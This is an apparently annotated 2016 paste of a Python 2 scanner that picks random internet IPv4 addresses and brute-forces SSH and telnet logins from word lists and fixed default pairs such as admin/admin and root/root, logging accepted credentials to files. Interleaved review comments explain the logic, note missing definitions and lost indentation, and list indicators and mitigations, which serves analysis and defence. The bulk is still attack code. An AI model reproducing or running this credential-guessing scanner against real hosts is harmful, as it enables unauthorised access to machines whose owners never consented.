
Untitled

a guest
Aug 16th, 2016
  # Review note: builds `switches`, a string of command-line flags mirroring the
  # parsed options; gen() later appends it to the command line it hands to
  # os.system() when -M is set. `options` is read here, but no parse_args() call
  # precedes this line in the paste, so the listing appears incomplete as published.
  # The fixed console strings printed below (for example '[!] Using ssh bruteforce')
  # are candidate string indicators when hunting for copies of this script.
  1. switches = ''
  2. print('\n ----PARAMETERS----')
  3. print('***********************************************')
  4. if options.targetPorts != None:
  5. print('[!] Scanning for port(s): ' + str(options.targetPorts))
  6. switches = switches + ' -p ' + str(options.targetPorts)
  # The -a/-b/-c forwarding lines are commented out, so the octet constraints are
  # printed but never added to `switches`.
  7. if options.aClass != None:
  8. print('[!] Scanning using first octet: ' + str(options.aClass))
  9. # switches = switches + ' -a ' + str(options.aClass)
  10. if options.bClass != None:
  11. print('[!] Scanning using second octet: ' + str(options.bClass))
  12. # switches = switches + ' -b ' + str(options.bClass)
  13. if options.cClass != None:
  14. print('[!] Scanning using third octet: ' + str(options.cClass))
  15. # switches = switches + ' -c ' + str(options.cClass)
  16. if options.brute != False:
  17. print('[!] Using ssh bruteforce')
  18. switches = switches + ' -l'
  19. if options.bruteTel != False:
  20. print('[!] Using telnet bruteforce')
  21. switches = switches + ' -T'
  22. if options.bruting != False:
  23. print('[!] Showing addresses being bruteForced')
  24. switches = switches + ' -1'
  25. if options.scanned != False:
  26. print('[!] Showing showing all scan fails')
  27. switches = switches + ' -2'
  28. if options.passAttempt != False:
  29. print('[!] Showing bruteforce attempts')
  30. switches = switches + ' -3'
  31. if options.openPort != False:
  32. print('[!] Showing addresses with open ports')
  33. switches = switches + ' -4'
  34. if options.verbose != False:
  35. print('[!] Showing all output')
  36. switches = switches + ' -V'
  37. if options.fixed != None:
  38. print('[!] Using a fixed login option: ' + str(options.fixed))
  39. switches = switches + ' -f ' + str(options.fixed)
  40. if options.bios != False:
  41. print('[!] Creating bios output')
  42. switches = switches + ' -B'
  43. if options.timeOut != None:
  44. print('[!] Using timeout: ' + str(options.timeOut))
  45. switches = switches + ' -o ' + str(options.timeOut)
  # fName is this script's resolved path; gen() uses it to re-invoke the script.
  46. fName = os.path.realpath(__file__)
  47. print('***********************************************\n')
  48.  
  49.  
  50.  
  # Review note: a `global` statement at module level has no effect; `fourth` is
  # simply initialised to 0 here and reassigned inside gen().
  51. global fourth
  52. fourth = 0
  53.  
  # Review note: go() only binds a local name `go` to True and returns None. It is
  # called from conn() after a successful SSH connect and has no visible effect.
  54. def go():
  55. # print('[!] NAILED IT!')
  56. go = True
  57.  
  # Review note: gen() picks target IPv4 addresses and dispatches them. Each octet
  # not pinned by -a/-b/-c is drawn with randint(1, 254); with -B the octets come
  # from the firstBios..fourthBios counters instead, whose initial values are not
  # set anywhere in the visible listing. For every address it either calls conn()
  # once per port or, with -M, re-launches this script through os.system().
  # The paste lost its indentation, so the nesting of the if/else chains below
  # cannot be recovered with certainty.
  58. def gen():
  59. global log
  60. global firstBios
  61. global secondBios
  62. global thirdBios
  63. global fourthBios
  64. global threads
  65. #print('started gen')
  66. try:
  # The same option table is rebuilt in conn() and main(); options are re-parsed
  # from the command line on every call.
  67. parser = optparse.OptionParser("%prog -t <target host(s)> -p <target port(s)>")
  68. parser.add_option('-t', dest='targetHosts', type='string', help='Specify the target host(s); Separate them by commas or enter \'scan\' to scan random addresses')
  69. parser.add_option('-p', dest='targetPorts', type='string', help='Specify the target port(s); Separate them by commas----use \'all\' to scan 1-65535')
  70. parser.add_option('-a', dest='aClass', type='string', help='Specify the 1st octet')
  71. parser.add_option('-b', dest='bClass', type='string', help='Specify the 2nd octet')
  72. parser.add_option('-c', dest='cClass', type='string', help='Specify the 3rd octet')
  73. parser.add_option('-s', dest='threads', type='int', help='Specify number of threads for scanning')
  74. parser.add_option('-l', action='store_true', dest='brute', default=False, help='Brute force ssh')
  75. parser.add_option('-T', action='store_true', dest='bruteTel', default=False, help='Brute force telnet')
  76. parser.add_option('-1', action='store_true', dest='bruting', default=False, help='Displays addresses that are being brute forced')
  77. parser.add_option('-2', action='store_true', dest='scanned', default=False, help='Displays address that could not be connected to')
  78. parser.add_option('-3', action='store_true', dest='passAttempt', default=False, help='Displays each password attempt during brute force')
  79. parser.add_option('-4', action='store_true', dest='openPort', default=False, help='Displays when an address has the searched port open')
  80. parser.add_option('-V', action='store_true', dest='verbose', default=False, help='Verbose mode')
  81. parser.add_option('-f', dest='fixed', type='string', help='Specify a fixed login(1, 2, 3, 4)')
  82. parser.add_option('-B', action='store_true', dest='bios', default=False, help='Create a bios for vuln using iterating IP gen')
  83. parser.add_option('-o', dest='timeOut', type='float', help='Set a timeout value for scanning')
  84. parser.add_option('-M', action='store_true', dest='master', default=False, help='User multiprocess scanning')
  85. parser.add_option('-C', action='store_true', dest='child', default=False, help='DO NOT USE')
  86. (options, args) = parser.parse_args()
  87. if options.threads != None:
  88. threads = options.threads
  89. global fourth
  90. going = True
  91. processes = 0
  # Addresses are chosen without regard to who owns them, so unused or monitored
  # address space (darknet sensors, honeypots) receives these connection attempts
  # like any other host. `going` is only cleared in the -B branches below.
  92. while going == True:
  93. if (options.aClass == None):
  94. if options.bios == False:
  95. first = randint(1, 254)
  96. else:
  97. first = firstBios
  98. if secondBios >= 255:
  99. firstBios = firstBios + 1
  100. secondBios = 1
  101. if firstBios >= 255:
  102. # print('[!] Reached maximum address allocation: EXITING')
  103. going = False
  104. break
  105. # sys.exit()
  106. else:
  107. first = options.aClass
  108. if options.bios != False:
  109. if secondBios >= 255:
  110. # print('[!] Reached maximum address allocation: EXITING')
  111. going = False
  112. break
  113. # sys.exit()
  114. if (options.bClass == None):
  115. if options.bios == False:
  116. second = randint(1, 254)
  117. else:
  118. second = secondBios
  119. if thirdBios >= 255:
  120. secondBios = secondBios + 1
  121. thirdBios = 1
  122. else:
  123. second = options.bClass
  124. if options.bios != False:
  125. if thirdBios >= 255:
  126. # print('[!] Reached maximum address allocation: EXITING')
  127. going = False
  128. break
  129. # sys.exit()
  130. if (options.cClass == None):
  131. if options.bios == False:
  132. third = randint(1, 254)
  133. else:
  134. third = thirdBios
  135. if fourthBios >= 255:
  136. thirdBios = thirdBios + 1
  137. fourthBios = 1
  138. else:
  139. third = options.cClass
  140. if options.bios != False:
  141. if fourthBios >= 255:
  142. # print('[!] Reached maximum address allocation: EXITING')
  143. going = False
  144. break
  145. # sys.exit()
  146. if options.bios == False:
  147. fourth = randint(1, 254)
  148. else:
  149. fourth = fourthBios
  150. fourthBios = fourthBios + 1
  151. targetHost = str(first) + '.' + str(second) + '.' + str(third) + '.' + str(fourth)
  152. targetPorts = str(options.targetPorts).split(',')
  153. if options.master == False:
  154. for targetPort in targetPorts:
  155. conn(targetHost, int(targetPort))
  156. else:
  # The child command line is assembled by string concatenation and run through
  # the shell in the background (trailing '&'). In process telemetry this shows up
  # as the Python interpreter re-invoking the same script path with
  # '-t <address> ... -C'.
  157. command = str(sys.executable) + ' ' + str(fName) + ' -t ' + str(targetHost) + str(switches) + ' -C &'
  158. try:
  159. os.system(command)
  160. # subprocess.Popen(command, shell = True)
  161. # print(command)
  162. processes = processes + 1
  163. except:
  164. print('[!] Couldn\'t start separate process: ' + str(targetHost))
  165. # print('[!] ' + targetHost + '|' + str(targetPort))
  166. if options.master != False:
  167. print('[!] Finished assigning jobs | processes started: ' + str(processes) + '\n')
  168. except KeyboardInterrupt:
  169. print('Scanning stopped')
  170. sys.exit()
  171.  
  # Review note: conn() probes one host/port pair. It re-parses the command line
  # with optparse, opens a TCP connection, and on success appends a line to
  # log.txt (or the bare address to bios.txt when -B is set). If -T is set and the
  # port is 23 it then loops over `usernames` x `passwords` via telnetlib; if -l is
  # set and the port is 22 it does the same via paramiko. `usernames` and
  # `passwords` are not defined anywhere in the visible listing.
  # Python 2 only: `except Exception, e` and the print statements below are not
  # valid Python 3.
  # The paste lost its indentation, so nesting cannot be recovered with certainty;
  # the notes below describe individual statements only.
  # Artefacts written to the working directory: log.txt, bios.txt, vuln.txt,
  # login.txt and paramiko's filename.log. Result lines use the pipe-delimited
  # form host|username|password|port.
  172. def conn(targetHost, targetPort):
  173. global threads
  174. parser = optparse.OptionParser("%prog -t <target host(s)> -p <target port(s)>")
  175. parser.add_option('-t', dest='targetHosts', type='string', help='Specify the target host(s); Separate them by commas or enter \'scan\' to scan random addresses')
  176. parser.add_option('-p', dest='targetPorts', type='string', help='Specify the target port(s); Separate them by commas----use \'all\' to scan 1-65535')
  177. parser.add_option('-a', dest='aClass', type='string', help='Specify the 1st octet')
  178. parser.add_option('-b', dest='bClass', type='string', help='Specify the 2nd octet')
  179. parser.add_option('-c', dest='cClass', type='string', help='Specify the 3rd octet')
  180. parser.add_option('-s', dest='threads', type='int', help='Specify number of threads for scanning')
  181. parser.add_option('-l', action='store_true', dest='brute', default=False, help='Brute force ssh')
  182. parser.add_option('-T', action='store_true', dest='bruteTel', default=False, help='Brute force telnet')
  183. parser.add_option('-1', action='store_true', dest='bruting', default=False, help='Displays addresses that are being brute forced')
  184. parser.add_option('-2', action='store_true', dest='scanned', default=False, help='Displays address that could not be connected to')
  185. parser.add_option('-3', action='store_true', dest='passAttempt', default=False, help='Displays each password attempt during brute force')
  186. parser.add_option('-4', action='store_true', dest='openPort', default=False, help='Displays when an address has the searched port open')
  187. parser.add_option('-V', action='store_true', dest='verbose', default=False, help='Verbose mode')
  188. parser.add_option('-f', dest='fixed', type='string', help='Specify a fixed login(1, 2, 3, 4)')
  189. parser.add_option('-B', action='store_true', dest='bios', default=False, help='Create a bios for vuln using iterating IP gen')
  190. parser.add_option('-o', dest='timeOut', type='float', help='Set a timeout value for scanning')
  191. parser.add_option('-M', action='store_true', dest='master', default=False, help='User multiprocess scanning')
  192. parser.add_option('-C', action='store_true', dest='child', default=False, help='DO NOT USE')
  193. (options, args) = parser.parse_args()
  194. if options.threads != None:
  195. threads = options.threads
  196. co = True
  197.  
  198. scan = False
  199. if targetHost == 'scan':
  200. targetPort = str(options.targetPorts).split(',')
  201. # print(options.targetHosts) print(targetHost)
  202. print('Scanning for ports: ' + str(targetPort))
  203. count = 0
  204. while count < 1:
  205. try:
  # The local name `conn` shadows this function inside its own body.
  206. conn = socket(AF_INET, SOCK_STREAM)
  207. # if options.timeOut != None:
  208. # conn.setsockettimeout(int(options.timeOut))
  209. if targetHost == 'scan':
  210. targetHost = gen()
  211. count = count - 1
  212. scan = True
  213. for port in targetPort:
  214. try:
  215. conn.connect((targetHost, int(port)))
  216. conn.close()
  217. except Exception, e:
  218. if options.scanned != False or options.verbose != False:
  219. print '[!] Connection to ' + targetHost + ' port ' + str(port) + ' failed: ' + str(e)
  220. co = False
  221. conn.close()
  222. conn = socket(AF_INET, SOCK_STREAM)
  223.  
  224. else:
  225. conn.connect((targetHost, targetPort))
  226. conn.close()
  # Open-port results are appended to log.txt, or the bare address to bios.txt
  # when -B is set.
  227. if scan == False:
  228. if options.openPort != False or options.verbose != False and options.bios == False:
  229. print '[+] Connection to ' + targetHost + ' port ' + str(targetPort) + ' succeeded!'
  230. elif options.bios != False:
  231. print(targetHost)
  232. if options.bios == False:
  233. log = open('log.txt', 'a')
  234. log.write('[+] Connection to ' + targetHost + ' port ' + str(targetPort) + ' succeeded!\n')
  235. else:
  236. log = open('bios.txt', 'a')
  237. log.write(targetHost + '\n')
  238. log.close()
  239. elif co == True:
  240. if options.openPort != False or options.verbose != False and options.bios == False:
  241. print '[+] Connection to ' + targetHost + ' port ' + str(port) + ' succeeded!'
  242. log = open('log.txt', 'a')
  243. log.write('[+] Connection to ' + targetHost + ' port ' + str(port) + ' succeeded!\n')
  244. elif options.bios != False:
  245. print(targetHost)
  246. log = open('bios.txt', 'a')
  247. log.write(targetHost + '\n')
  248. log.close()
  # Telnet branch (port 23 with -T): after each password it sends 'ls' and 'exit'
  # and reads the whole response. A response without 'Authentication failed' is
  # treated as a hit, and a hit is recorded in vuln.txt only when the response
  # contains 'logout'. Disabling telnet, or removing default accounts where it
  # must stay, removes this exposure.
  249. if options.bruteTel != False and int(targetPort) == 23:
  250. br = True
  251. good = False
  252. HOST = targetHost
  253. if options.bruting != False or options.verbose != False:
  254. print('Attempting telnet brute force: ' + str(HOST))
  255. tn = telnetlib.Telnet(HOST)
  256. tn.read_until('login: ')
  257. # if 'closed' in resp:
  258. # print('[!] Closed in resp')
  259. # br = False
  260. # good = False
  261. # pass
  262. for username in usernames:
  263. for password in passwords:
  264. if options.passAttempt != False or options.verbose != False:
  265. print('[!] Trying: ' + HOST + ' | username: ' + username + ' | password: ' + password)
  266. user = username
  267. # try:
  268. tn.write(user + "\n")
  269. # except:
  270. # print('[!] Username invalid')
  271. # br = False
  272. try:
  273. # if password:
  274. # print('[!] waiting for password prompt')
  275. tn.read_until('Password: ')
  276. # print('[!] got password prompt')
  277. tn.write(password + "\n")
  278. # print('[!] presented password')
  279. # print('[!] Sending verification command')
  280. tn.write("ls\n")
  281. tn.write("exit\n")
  282. # print('[!] Sent command')
  283. # print('[!] read all')
  284. br = True
  285. good = True
  286. # print('[!] Changed variables')
  287. resp = tn.read_all()
  288. # print('[!] set resp variable')
  289. # print(resp)
  290. if 'Authentication failed' in resp:
  291. # print('[!] Authentication failed')
  292. br = False
  293. good = False
  294. pass
  295. elif 'Authentication failed' not in resp:
  296. br = True
  297. good = True
  298. break
  299. else:
  300. br = False
  301. good = False
  302. pass
  303. except:
  304. br = False
  305. good = False
  306. # print('[!] Password invalid')
  307. pass
  308. if br == True:
  309. break
  310. if 'logout' in resp:
  311. print('Succeeded: ' + targetHost + '|' + str(username) + '|' + str(password) + '|' + str(targetPort))
  312. log=open('vuln.txt', 'a')
  313. log.write(targetHost + '|' + str(username) + '|' + str(password) + '|' + str(targetPort) + '\n')
  314. log.close()
  315. tn.close()
  # SSH branch (port 22 with -l): a new SSHClient is created and connected for
  # every username/password pair, so each guess is a separate TCP connection and
  # a separate authentication failure in the server's auth log. AutoAddPolicy
  # accepts whatever host key the server presents. Key-only authentication and
  # rate limiting of failed logins defeat this loop.
  316. if options.brute != False and int(targetPort) == 22:
  317. # ssh = paramiko.Transport((targetHost, targetPort))
  318. if options.bruting != False or options.verbose != False:
  319. print('Attempting ssh brute force: ' + targetHost)
  320. br = True
  321. good = False
  322. if options.fixed == None:
  323. for username in usernames:
  324. # print('[!] Using username: ' + str(username))
  325. for password in passwords:
  326. br = True
  327. if options.passAttempt != False or options.verbose != False:
  328. print('Trying ' + targetHost + ' | username: ' + str(username) + ' | password: ' + password)
  329. try:
  330. # ssh.connect(username=username, password=password)
  331. ssh = paramiko.SSHClient()
  332. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  333. paramiko.util.log_to_file("filename.log")
  334. ssh.connect(targetHost, port=int(targetPort), username=username, password=password, timeout=10)
  335. ssh.close()
  336. go()
  337. br = True
  338. # print('[!] Set br to True')
  339. good = True
  340. break
  341. except:
  342. ssh.close()
  343. br = False
  344. pass
  345. if br == True:
  346. # print('[!] Using br')
  347. break
  348. #END OF FOR LOOP
  349. # print('[!] Made it to else')
  350. else:
  351. # print('[!] Entered else')
  # Fixed login options 1-4 map to admin/admin, admin/1234, root/root and
  # root/1234. Hosts that still accept one of these pairs with password
  # authentication are what this branch finds.
  352. if options.fixed == '1':
  353. username = 'admin'
  354. password = 'admin'
  355. elif options.fixed == '2':
  356. username = 'admin'
  357. password = '1234'
  358. elif options.fixed == '3':
  359. username = 'root'
  360. password = 'root'
  361. elif options.fixed == '4':
  362. username = 'root'
  363. password = '1234'
  364. else:
  365. print('[!] That is not a fixed login option')
  366. sys.exit()
  367. br = True
  368. if options.passAttempt != False or options.verbose != False:
  369. print('Trying: ' + targetHost + ' | username: ' + str(username) + ' | password: ' + str(password) + ' | port: ' + str(targetPort))
  370. try:
  371. # ssh.connect(username=username, password=password)
  372. ssh = paramiko.SSHClient()
  373. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  374. paramiko.util.log_to_file("filename.log")
  375. ssh.connect(targetHost, port=int(targetPort), username=username, password=password, timeout=10)
  376. ssh.close()
  377. go()
  378. br=True
  379. good=True
  380. # print('[!] Good is True')
  381. except:
  382. ssh.close()
  383. br=False
  384. # print('[!] Good is false')
  385. good=False
  386. pass
  387. # if br == True:
  388. # print('[!] br is true')
  389. # print('[!] Made it past else')
  390. output = 'nope'
  391. # print(good)
  # Accepted SSH credentials are appended to login.txt in clear text.
  392. if good == True:
  393. # print('[!] good is true')
  394. # stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  395. # output = stdout.read()
  396. # print(output)
  397. # if 'inet' in output:
  398. print('Succeeded: ' + targetHost + '|' + username + '|' + password + '|' + str(targetPort))
  399. log = open('login.txt', 'a')
  400. log.write(targetHost + '|' + username + '|' + password + '|' + str(targetPort) + '\n')
  401. log.close()
  402. # ssh.close()
  403. except Exception, e:
  404. if scan == False:
  405. if options.scanned != False or options.verbose != False:
  406. print '[!] Connection to ' + targetHost + ' port ' + str(targetPort) + ' failed: ' + str(e)
  407. finally:
  408. # if scan == False:
  409. # conn.close()
  410. count = count + 1
  411. if scan == True:
  412. targetHost = 'scan'
  413.  
  # Review note: entry point. Re-parses the same option set as gen() and conn(),
  # prints the usage string and exits when -t or -p is missing, sets the global
  # socket timeout (the -o value, else 5 seconds), then either starts the
  # worker-thread pool (-t scan) or walks every host/port pair through conn().
  # The paste lost its indentation, so nesting cannot be recovered with certainty.
  414. def main():
  415. global scan
  416. global threads
  417. parser = optparse.OptionParser("%prog -t <target host(s)> -p <target port(s)>")
  418. parser.add_option('-t', dest='targetHosts', type='string', help='Specify the target host(s); Separate them by commas or enter \'scan\' to scan random addresses')
  419. parser.add_option('-p', dest='targetPorts', type='string', help='Specify the target port(s); Separate them by commas----use \'all\' to scan 1-65535')
  420. parser.add_option('-a', dest='aClass', type='string', help='Specify the 1st octet')
  421. parser.add_option('-b', dest='bClass', type='string', help='Specify the 2nd octet')
  422. parser.add_option('-c', dest='cClass', type='string', help='Specify the 3rd octet')
  423. parser.add_option('-s', dest='threads', type='int', help='Specify number of threads for scanning')
  424. parser.add_option('-l', action='store_true', dest='brute', default=False, help='Brute force ssh')
  425. parser.add_option('-T', action='store_true', dest='bruteTel', default=False, help='Brute force telnet')
  426. parser.add_option('-1', action='store_true', dest='bruting', default=False, help='Displays addresses that are being brute forced')
  427. parser.add_option('-2', action='store_true', dest='scanned', default=False, help='Displays address that could not be connected to')
  428. parser.add_option('-3', action='store_true', dest='passAttempt', default=False, help='Displays each password attempt during brute force')
  429. parser.add_option('-4', action='store_true', dest='openPort', default=False, help='Displays when an address has the searched port open')
  430. parser.add_option('-V', action='store_true', dest='verbose', default=False, help='Verbose mode')
  431. parser.add_option('-f', dest='fixed', type='string', help='Specify a fixed login(1, 2, 3, 4)')
  432. parser.add_option('-B', action='store_true', dest='bios', default=False, help='Create a bios for vuln using iterating IP gen')
  433. parser.add_option('-o', dest='timeOut', type='float', help='Set a timeout value for scanning')
  434. parser.add_option('-M', action='store_true', dest='master', default=False, help='User multiprocess scanning')
  435. parser.add_option('-C', action='store_true', dest='child', default=False, help='DO NOT USE')
  436. (options, args) = parser.parse_args()
  437. if options.threads != None:
  438. threads = options.threads
  439. print('Scanning threads: ' + str(options.threads))
  # The flag assigned in the next two branches is not read anywhere in the
  # visible listing.
  440. if options.brute != False:
  441. if options.child == False:
  442. # print('Using ssh brute force')
  443. fuck = True
  444. if options.bruteTel != False:
  445. if options.child == False:
  446. # print('Using telnet brute force')
  447. fuck = True
  # `|` here is the bitwise operator applied to two booleans; both comparisons are
  # always evaluated.
  448. if (options.targetHosts == None) | (options.targetPorts == None):
  449. print parser.usage
  450. exit(0)
  451.  
  452. targetHosts = str(options.targetHosts).split(',')
  453. if (options.targetPorts != 'all'):
  454. targetPorts = str(options.targetPorts).split(',')
  455. elif (options.targetHosts != 'scan'):
  456. targetPorts = range(1, 65535)
  # setdefaulttimeout() applies process-wide to sockets created afterwards.
  457. if (options.targetPorts == 'all'):
  458. if options.timeOut != None:
  459. setdefaulttimeout(options.timeOut)
  460. print('Using timout: ' + str(options.timeOut))
  461. else:
  462. setdefaulttimeout(5)
  463. else:
  464. if options.timeOut != None:
  465. setdefaulttimeout(options.timeOut)
  466. if options.child == False:
  467. print('Using timout: ' + str(options.timeOut))
  468. else:
  469. setdefaulttimeout(5)
  470. if options.targetHosts == 'scan':
  471. #print('creating workers')
  472. try:
  473. # print('entered try')
  474. create_workers()
  475. create_jobs()
  476. except KeyboardInterrupt:
  477. print('enteres except')
  478. print('Stopping all threads')
  479. sys.exit()
  480. else:
  481. for targetHost in targetHosts:
  482. for targetPort in targetPorts:
  483. conn(targetHost, int(targetPort))
  484. #print ''
  485.  
  # Review note: starts NUMBER_OF_THREADS daemon threads, each running work().
  # NUMBER_OF_THREADS is not defined in the visible listing; the `threads` global
  # set from -s is declared here but not read in this function.
  486. #Create worker threads
  487. def create_workers():
  488. global threads
  489.  
  490. for _ in range(NUMBER_OF_THREADS):
  491. t = threading.Thread(target=work)
  492. t.daemon = True
  493. t.start()
  # Review note: worker loop. Blocks on queue.get(), runs gen() when the job value
  # is 1, and calls queue.task_done(). `queue` is not defined in the visible
  # listing, and the lost indentation hides whether task_done() sits inside the
  # `if` or directly in the loop body.
  494. #Do the next job in the queue
  495. def work():
  496. while True:
  497. x = queue.get()
  498. if x == 1:
  499.  
  500. try:
  501. gen()
  502. except KeyboardInterrupt:
  503. sys.exit()
  504. queue.task_done()
  # Review note: puts the value 1 on the queue once per element of JOB_NUMBER, then
  # blocks in queue.join() until every job has been marked done. JOB_NUMBER is not
  # defined in the visible listing.
  505. #Each list item is a new job
  506. def create_jobs():
  507. for x in JOB_NUMBER:
  508. queue.put(1)
  509. # queue.put(1)
  510. queue.join()
  511.  
  # Review note: the __main__ guard is commented out, so main() runs whenever the
  # module is executed or imported. Ctrl-C is caught and only prints a message.
  512. #if __name__ == '__main__':
  513. try:
  514. main()
  515. except KeyboardInterrupt:
  516. print('fuck')